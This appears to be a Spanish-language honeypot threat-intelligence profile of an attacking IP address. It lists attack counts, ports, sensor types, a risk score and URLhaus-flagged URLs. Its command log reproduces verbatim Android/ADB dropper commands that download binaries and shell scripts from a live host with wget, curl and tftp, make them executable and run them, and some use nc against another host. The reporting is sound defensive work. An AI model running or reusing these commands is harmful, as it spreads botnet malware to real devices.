Amenaza Activa • CRITICO
130.12.180.18
🎯
2412
Ataques Totales
🔌
61
Puertos
📡
6
Tipos Ataque
🦠
4
Malware
Geolocalizacion
- Pais
- 🇺🇸 Estados Unidos
- Ciudad
- Desconocida
- ASN
- AS214943
- ISP
- Railnet LLC
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
dionaea
h0neytr4p
Puertos Atacados
345678081377772380886161661617555555565559888895304438000800180028003800480058006+41
Malware Asociado
Comandos Ejecutados
$
cd /data/local/tmp/; rm arm7 -rf ; busybox wget http://130.12.180.20:36695/arm7; chmod 755 arm7; ./arm7 adblocker;79x$
cd /data/local/tmp/; rm -rf received; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received android_230x$
cd /data/local/tmp/; rm -rf received; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received android_230x$
A=$(getprop ro.product.cpu.abi);[ "$A" = "x86_64" ]&&B=x86_64;[ "$A" = "x86" ]&&B=x86;[ "$A" = "arm64-v8a" ]&&B=arm64;[ -z "$B" ]&&B=arm7;cd /data/local/tmp;(busybox wget http://130.12.180.20:36695/$B -O $B||wget http://130.12.180.20:36695/$B -O $B||curl http://130.12.180.20:36695/$B -o $B||toybox wget http://130.12.180.20:36695/$B -O $B);chmod 777 $B;./$B floydbot &28x$
cd /data/local/tmp;rm -rf .a;(busybox wget http://130.12.180.20:36695/arm7 -O .a||wget http://130.12.180.20:36695/arm7 -O .a||curl http://130.12.180.20:36695/arm7 -o .a||toybox wget http://130.12.180.20:36695/arm7 -O .a);chmod 777 .a;./.a floydbot &27x$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm725x$
cd /data/local/tmp/;rm -rf w.sh; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; rm -rf c.sh; curl -O http://130.12.180.20:36695/c.sh; sh c.sh; rm -rf wget.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl -O http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl -O http://130.12.180.20:36695/wget.sh; sh wget.sh; rm -rf tftp.sh; busybox tftp -g -r tftp.sh 130.12.180.20 69; chmod 777 tftp.sh; sh tftp.sh25x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7; curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7; wget http://130.12.180.20:36695/arm7; chmod +x arm7; ./arm7; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm723x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || /system/bin/wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || /system/xbin/wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || busybox curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || /system/bin/curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || /syste21x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 proxy; curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7 proxy; wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 proxy21xURLhaus Intel2 URLsabuse.ch
Esta IP ha usado las siguientes URLs maliciosas conocidas:
http://130.12.180.20:36695/w.shofflinemalware_downloadshua-wget
http://130.12.180.20:36695/wget.shofflinemalware_downloadshua-wget
Evaluacion de Riesgo
95
/100
BajoMedioAltoCritico